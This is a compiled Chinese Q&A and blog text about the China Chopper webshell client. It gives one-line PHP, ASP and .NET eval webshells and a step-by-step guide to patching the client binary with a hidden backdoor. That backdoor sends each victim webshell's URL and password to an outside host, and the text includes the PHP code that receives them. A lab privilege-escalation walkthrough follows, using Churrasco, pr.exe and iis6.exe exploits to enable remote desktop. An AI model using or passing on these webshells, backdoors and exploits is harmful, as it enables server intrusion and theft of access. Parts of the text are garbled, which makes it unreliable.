菜刀脚本软件

① 如何使用JSP一句话木马和菜刀木马

你好，
一句话木马分为客户端和服务端，服务端就是你要传到网站上的，只有一句话代码的那个脚本，传上去后记住地址，然后本地打开客户端，填上你的一句话木马地址和密码，连接就可以了，推荐用中国菜刀，官网地址www.maicai.com

希望回答对您有帮助.

② 中国菜刀是什么软件

中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。

只要支持动态脚本的网站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等]，都可以用中国菜刀来进行管理！

常用功能：
文件管理，虚拟终端，数据库管理。

其它功能：
WEB浏览器(POST浏览/自定义COOKIE浏览/自定义JS)
网站爬行(自动保存目录结构)
网站安全扫描。

在非简体中文环境下使用，自动切换到英文界面。

③ 如何给中国菜刀添加隐蔽后门

1、后门如何触发
这里要先讲下菜刀的后门是如何触发的，知道如何触发后门，后面按这个思路往下看会方便些。
当一句话连回目标服务器时，我们经常会在文件列表中右键查看文件，如下图

当我们执行右键-编辑文件时，我们的后门就会被触发（我们要添加的就是这样的一个隐藏后门）。
2、菜刀脱壳
在分析菜刀前，先把菜刀的壳脱掉，使用Peid可知，菜刀是UPx壳，网上找个Upx的脱壳工具即可脱壳。
3、查看数据包，分析流程（右键-编辑）
本地搭建好环境后，在菜刀中右键-编辑查看某一文件，使用burpsuite进行抓包，

数据如下
a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=%w8LSIpO2RpZSgpOw%3D%3D&z1=%3D%3D

一共有3个参数，
a url解码后为@eval (base64_decode($_POST[z0]));
z0先url解码，在base64解码为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();

Z1先url解码，在base64解码为
C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来，这段代码就是一个读文件的php脚本，由菜刀发送到目标服务器上，然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上，那我我们可以再字符串上添加我们想执行的代码，由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我们将上这段代码作为字符串，发送到服务端执行，我们就能获得webshell的地址和密码。
4、使用OD分析
使用OD打开中国菜刀，右键搜索字符串，结果如下：

定位到php读取文的字符串处，点击进去到代码处

可知，程序时将其作为字符串，压入栈中作为参数被后续函数处理的，如果在这段字符串后加入我们的后门代码，就会被程序一块发送到服务端执行。
5、修改菜刀程序文件
由上可知，字符串的地址为0x49ba94,查看内存数据，

发现其后面已经被他字符串占用（直接查看原二进制文件结果也是如此），如果我们强制在后面添加后门字符串，就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间，将后门代码放在此处。
这里我们选取地址4841d0h的空间，转化为文件偏移即为841d0h。
将后门字符串
$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放到文件841d0处
打开010editor 将上述字符串复制到010editor中，

由于程序中的字符串是双字节存放的，这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序，跳到841d0h偏移处，将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度，

保存文件，这样后门字符串就被我们添加到程序中了。
6、使用OD修改程序代码
用OD打开菜刀程序，定位到第4步中字符串入栈的代码处 push 0049bae4。
0049bae4地址是修改前字符串的位置，现在我们将其改成我们添加的字符串的地质处，字符串文件偏移为841d0h，转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。
7、测试修改结果
修改文件后，我们在看看菜刀-右键编辑，抓到数据包

Z0解密后为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?cai='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|<-");die();

可见我们的后门代码也一起被发送到服务端执行了。
编写加单的getx.php接收结果，
getx.php:
<?php
$getx = $_GET["cai"];
$file = fopen("getx.txt","a+");
fwrite($file,$getx);
fwrite($file,"\r\n");
fclose($file);
?>

结果如下：

8、后记
通过测试可知，对于asp，aspx跟php后门的添加相似，都可以实现。Jsp木马形式不一，实现添加后门较为困难。另外，由于后门是在服务端执行的，所以不容易被发现，本地抓包是检测不到后门的；OD中右键查看后门地址也是不能直接看到的。

④ windows靶场提权总结

最近做了几个i春秋的靶场，从getshell到提权，练习的还是很全面的，这里主要对提权做个总结。

先从提权反推一下思路： 提权 -> 上传提权工具 -> 找上传点 -> 连接菜刀getshell -> 写入或上传一句话 -> 找到写入点或上传点

一句话的写入点或上传点大多都是在管理后台发现的，因为用户的权限较低，可以操作的功能也较少，而且对于用户的输入或上传也有很严格的过滤机制，所以使用用户权限来写入或上传一句话的成功率很低。
那么就需要登录管理后台来写入或上传一句话，登录管理后台有两个条件： ①找到管理后台 。 ②拿到管理员账号和密码 （爆破也可以，但是成功率很低，这里就不多做讨论了）。登录进管理员后台后，就可以测试哪个地方可以利用，可以上传或写入一句话了。然后就是上面的一系列操作，最后拿到flag。

拿我做的这几个靶场为例，首先打开浏览器看到页面，发现都是一些CMS，从页面信息可以知道CMS版本等信息，然后信息搜集看看这个版本之前有没有爆出过漏洞，如果有sql注入最好，可以尝试通过注入拿到管理员账号、密码。当然也可以使用其他的方法，怎么猥琐怎么来。
然后扫描目录，如果管理员没有修改CMS的默认目录的话，管理后台还是很好扫出来的，如果修改过就比较困难了，就看你的字典强不强大了。当然也可以利用一些其他方法，比如信息泄露，如果是dedeCMS的话可以尝试访问 /data/mysqli_error_trace.inc 路径或 /data/mysql_error_trace.inc 路径，有可能会爆出后台路径。
拿到账号密码和管理后台路径后就可以登录后台了，然后寻找哪个地方可以执行一句话，比如上传图片马然后利用文件包含或解析漏洞执行一句话，或者试一下发表文章功能，试一下网站配置信息。反正姿势越猥琐越好。
拿到一句话的饥首路径后可以连菜刀了，连上菜刀后由于权限问题，C盘一般是没有读写权限的，而大多数flag都放在C盘，所以我们就要找一个有上传文件权限的目录上传提权工具进行提权，这里着重总结两种提权方法。

利用 CVE-2009-0079 的漏洞，工具： Churrasco.exe + cmd.exe + 3389.bat ，其中 cmd.exe 是为了代替原服务器中权限受限的命令行交互环境，Churrasco.exe 是用于提权的漏洞利用工具，3389.bat 是打开 3389 端口及远程桌面服务的批处理脚本文件。

提权命令：

同样是利用 CVE-2009-0079 的漏洞，工具： pr.exe + cmd.exe + 3389.bat ，与churrasco类似，命令和churrasco提指神权命令一样，不过第一次输入命令会报错，再输入一遍就好了。

iis.exe 与前两者不同，是基于 CVE-2009-1535 漏洞的提权工具，工具： iis6.exe + cmd.exe + 3389.bat ，用法与前两种工具类似，第一次创建用户时也可能会报错，若创建失败，再次执行即可。

现在提权已经完成了，打开CMD输入 mstsc 启动远程桌面登录，输入目标ip和刚才创建的用户的登录账号密码就可以远程访问服务器了，然后进入C盘拿唯肢亏到flag即可。

参考链接：
【i春秋】渗透测试入门 —— 我很简单，请不要欺负我

⑤ 中国菜刀的功能介绍：

只要支持动态脚本的网站，都可以用中国菜刀来进行管理！主要功能有：文件管理，虚拟终端，数据库管理。
UINCODE方式编译，支持多国语言输入显示。
一、EVAL客户端部分
1）要了解的
服务端只需要简单的一行代码，即可用此程序实现常用的管理功能。
支持的服务端脚本：PHP, ASP，NET。
在服务端运行的代码如下：
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request(pass)%>
.NET: <%@ Page Language=Jscript%><%eval(Request.Item[pass],unsafe);%>
(注意: .NET要单独一个文件或此文件也是Jscript语言)
2）怎么用
在主视图中右键/添加，在弹出的对话框中输入服务端地址，连接的密码(请注意上例中的pass字串)，选择正确的脚本类型和语言编码，保存后即可使用文件管理，虚拟终端，数据库管理三大块功能。要是其它都没错误，那么可能就是你把语言编码选错了。
1. 文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;
2.虚拟终端：[特色]人性化的设计，操作方便;(输入HELP查看更多用法)
3.数据库管理：[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
注意：由于服务器的安全设置，某些功能可能不能正常使用。
3) 关于配置信息怎么填？
A) 数据库方面：
PHP脚本：
<T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
<H>主机地址<H> 主机地址可为机器名或IP地址，如localhost
<U>数据库用户</U> 连接数据库的用户名，如root
<P>数据库密码</P> 连接数据库的密码，如123455
ASP和.NET脚本：
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面：
添加额外附加提交的数据：应付这种情况：if ($_POST['action']=='test'){@eval($_POST['pass']);}
<O>action=test</O>
提交功能前先POST额外的数据包：会话期间只提交一次。
<DATA>uid=user1&pwd=123456</DATA>
二、网站蜘蛛
织出一张网站的目录结构。
下载的列表文件存在桌面，右键菜单/载入URL列表即可以根据地址得到目录结构。
三、定时提醒
当闹钟事使吧, 周期：每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里，可以指定用户身份运行程序。这部分数据是以加密存储的。
五、浏览器
地址栏输入HELP，更多精彩后续加入。
六、其它部分
等待加入。
附带工具
update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。
把wscdb文件整到当前目录，运行update.exe得到新的数据库文件cai.mdb
把菜刀的数据库db.mdb替换掉即可。